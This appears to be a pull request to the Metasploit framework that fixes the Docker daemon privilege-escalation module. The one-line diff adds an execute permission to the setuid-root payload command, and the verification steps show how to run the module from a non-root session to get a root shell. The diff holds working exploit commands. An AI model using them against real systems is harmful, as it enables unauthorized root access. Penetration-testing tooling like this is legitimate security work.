### PR TITLE
Fix permissions in docker priv_esc module

### DIFF
--- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
+++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     %Q{
       IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
-      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
+      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}; chmod +x #{exploit_path}"
       docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
       docker rmi -f $IMG
       #{exploit_path}


### PR DESCRIPTION
The previous command didn't give the original user enough permissions to execute the payload. This was resulting in permission denied and preventing me from getting a root shell. 

Fixes #8937

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a non-root session
- [x] `use exploit/linux/local/docker_daemon_privilege_escalation`
- [x] `set SESSION <non-root session ID>`
- [x] `exploit`. You should get a root shell.

